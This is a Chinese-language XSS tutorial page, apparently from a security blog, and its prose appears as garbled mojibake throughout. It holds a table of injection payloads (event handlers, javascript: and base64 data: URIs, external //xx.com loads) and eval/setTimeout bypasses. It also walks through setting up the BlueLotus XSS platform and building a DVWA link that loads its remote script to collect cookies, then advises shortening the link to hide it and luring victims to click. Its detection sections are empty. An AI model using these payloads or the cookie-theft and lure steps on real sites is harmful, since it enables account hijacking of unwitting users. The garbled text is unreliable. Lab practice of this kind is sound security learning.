I"£<h1 id="åŸºæœ¬çŸ¥è¯†">åŸºæœ¬çŸ¥è¯†</h1>

<h2 id="xss">xss</h2>

<p>xssæ˜¯ç”±äºæœªä¸¥æ ¼è¿‡æ»¤ç”¨æˆ·è¾“å…¥ï¼Œå¯¼è‡´htmlç½‘é¡µå†…å®¹å¯ç”±ç”¨æˆ·è¾“å…¥æ§åˆ¶ï¼Œä»è€Œå®ç°jsè¯­å¥æ’å…¥ï¼Œå®ŒæˆæŸäº›æ“ä½œã€‚</p>

<h2 id="xssåˆ†ç±»">XSSåˆ†ç±»</h2>

<p>åå°„æ€§XSS</p>

<p>å‚¨å­˜æ€§XSS</p>

<p>DOMå‹XSS</p>

<h2 id="xssè¾“å‡ºä½ç½®">XSSè¾“å‡ºä½ç½®</h2>

<ul>
  <li>
    <p>HTML</p>
  </li>
  <li>
    <p>JS</p>
  </li>
  <li>å±æ€§å€¼</li>
  <li>æ³¨é‡Š</li>
</ul>

<h1 id="ä½ç½®">ä½ç½®</h1>

<table>
  <thead>
    <tr>
      <th>æ ‡ç­¾</th>
      <th>å±æ€§</th>
      <th>ä¾‹</th>
      <th>ç¼–ç </th>
      <th>äº¤äº’</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>img</td>
      <td>onerror</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;img src=x onerror=prompt(1);&gt;</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>video</td>
      <td>onerror</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;video src=x onerror=prompt(1);&gt;</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>audio</td>
      <td>onerror</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;audio src=x onerror=prompt(1);&gt;</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>iframe</td>
      <td>src</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;iframe src="javascript:alert(1)"&gt;</code></td>
      <td><code class="language-plaintext highlighter-rouge">&lt;iframe/src="data:text&amp;sol;html;&amp;Tab;base64&amp;NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="&gt;</code></td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>embed</td>
      <td>src</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;embed/src=//xx.com/aa&gt;</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>form</td>
      <td>action</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;form action="Javascript:alert(1)"&gt;&lt;input type=submit&gt;</code></td>
      <td><code class="language-plaintext highlighter-rouge">&lt;form action='data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt'&gt;&lt;button&gt;CLICK</code></td>
      <td>æ˜¯</td>
    </tr>
    <tr>
      <td>form</td>
      <td>formaction</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME</code></td>
      <td>Â </td>
      <td>æ˜¯</td>
    </tr>
    <tr>
      <td>object</td>
      <td>Data</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;object/data=//xx.com/a</code></td>
      <td><code class="language-plaintext highlighter-rouge">&lt;object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="&gt;</code></td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>svg</td>
      <td>onload</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;svg/onload=prompt(1);&gt;</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>marquee</td>
      <td>onstart</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;marquee/onstart=confirm(1)&gt;/</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>body</td>
      <td>onload</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;body onload=prompt(1);&gt;</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>select</td>
      <td>onfocus</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;select autofocus onfocus=alert(1)&gt;</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>textarea</td>
      <td>onfocus</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;textarea autofocus onfocus=alert(1)&gt;</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>video</td>
      <td>onerror</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;video&gt;&lt;source onerror="javascript:alert(1)"&gt;</code></td>
      <td>Â </td>
      <td>å¦</td>
    </tr>
    <tr>
      <td>a</td>
      <td>onmouseover</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;a onmouseover=location='javascript:alert(1)'&gt;click</code></td>
      <td>Â </td>
      <td>æ˜¯</td>
    </tr>
    <tr>
      <td>a</td>
      <td>href</td>
      <td><code class="language-plaintext highlighter-rouge">&lt;a href="javascript:alert(1)//"&gt;Click&lt;/a&gt;</code></td>
      <td>Â </td>
      <td>æ˜¯</td>
    </tr>
  </tbody>
</table>

<h1 id="ç»•è¿‡">ç»•è¿‡</h1>

<h2 id="ä»£ç æ‰§è¡Œå‡½æ•°">ä»£ç æ‰§è¡Œå‡½æ•°</h2>

<h3 id="eval">eval</h3>

<p><code class="language-plaintext highlighter-rouge">eval("alert()")</code></p>

<h3 id="settimeout">setTimeout</h3>

<p><code class="language-plaintext highlighter-rouge">setTimeout("alert()",0)</code></p>

<h3 id="setinterval">setInterval</h3>

<p><code class="language-plaintext highlighter-rouge">var i = setInterval("alert();clearInterval(i);",0);</code></p>

<h3 id="æµè§ˆå™¨ç‰¹æœ‰å‡½æ•°">æµè§ˆå™¨ç‰¹æœ‰å‡½æ•°</h3>

<p>å¦‚<code class="language-plaintext highlighter-rouge">ie</code>çš„<code class="language-plaintext highlighter-rouge">execScript</code>ç­‰ï¼Œè¿™é‡Œä¸è¿‡å¤šå…³æ³¨ã€‚</p>

<h1 id="åˆ©ç”¨æ–¹å¼">åˆ©ç”¨æ–¹å¼</h1>

<h2 id="xsså¹³å°">xsså¹³å°</h2>

<p>XSSå¹³å°æ˜¯ç¼–å†™ç”¨äºè¾…åŠ©XSSæ”»å‡»çš„å¹³å°ï¼Œå¯ä»¥å°†æ”»å‡»è¯­å¥æ”¾åˆ°XSSå¹³å°ï¼Œç„¶ååœ¨XSSä½ç½®åŒ…å«è¿›å»ï¼Œä»¥åŠå¯ä»¥ç”¨å®ƒæ¥æ”¶cookieç­‰ä¿¡æ¯ã€‚</p>

<h3 id="bluelotuså¹³å°">bluelotuså¹³å°</h3>

<pre><code class="language-ä¸‹è½½Dockerfileï¼Œæ‰§è¡Œå‘½ä»¤å¦‚ä¸‹ï¼š">docker build -t bluelotus .

docker run -d -p 801:80 bluelotus

é»˜è®¤å¯†ç ä¸ºï¼šbluelotus
</code></pre>

<p><img src="/img/2020-12-17-XSS/image-20201217145920072.png" alt="image-20201217145920072" /></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>ç™»å½•xsså¹³å°ï¼Œé€‰æ‹©å…¬å…±æ¨¡æ¿ä¸­çš„default.jsï¼Œä¿®æ”¹websiteå€¼ä¸ºXSSå¹³å°ç«™ç‚¹åœ°å€å³å¯ï¼Œç„¶åå¤åˆ¶ç”Ÿæˆçš„jsåœ°å€ï¼Œåœ¨xssæ¼æ´é¡µé¢å¼•å…¥æˆ‘ä»¬ç”Ÿæˆçš„æ¶æ„jsè¯­å¥ã€‚
ä»¥DVWA DOMå‹XSSä¸ºä¾‹ï¼Œæ­¤æ—¶æ¶æ„é“¾æ¥ä¸ºï¼š
http://192.168.74.131:800/vulnerabilities/xss_d/?default=&lt;script src="http://192.168.74.131:801/template/default.js"&gt;&lt;/script&gt;
</pre></td></tr></tbody></table></code></pre></div></div>

<p><img src="/img/2020-12-17-XSS/image-20201217150114653.png" alt="image-20201217150114653" /></p>

<p><code class="language-plaintext highlighter-rouge">ä¸ºäº†æ›´å¥½çš„éšè”½ï¼Œå¯ä»¥å°†å½“å‰æ¶æ„é“¾æ¥ç”Ÿæˆä¸ºçŸ­åœ°å€ã€‚</code></p>

<p><img src="/img/2020-12-17-XSS/image-20201217150145677.png" alt="image-20201217150145677" /></p>

<p><code class="language-plaintext highlighter-rouge">å°†æ¶æ„çŸ­åœ°å€é“¾æ¥å‘é€ç»™è¢«æ”»å‡»è€…ï¼Œå¼•è¯±å…¶ç‚¹å‡»ã€‚ï¼ˆç”Ÿæˆæ—¶æœ‰äº›ç½‘ç«™ä¼šå°†XSSè¯­å¥è¿‡æ»¤ï¼‰</code></p>

<h1 id="é»‘ç›’æ£€æµ‹">é»‘ç›’æ£€æµ‹</h1>

<h1 id="æµé‡æ£€æµ‹">æµé‡æ£€æµ‹</h1>

<h1 id="å‚è€ƒ">å‚è€ƒ</h1>

<p><a href="http://www.xwood.net/_site_domain_/_root/5870/5874/t_c268566.html">å¸¸è§å‡ ç§è·¨ç«™è„šæœ¬æ¼æ´å®‰å…¨æµ‹è¯•</a></p>
:ET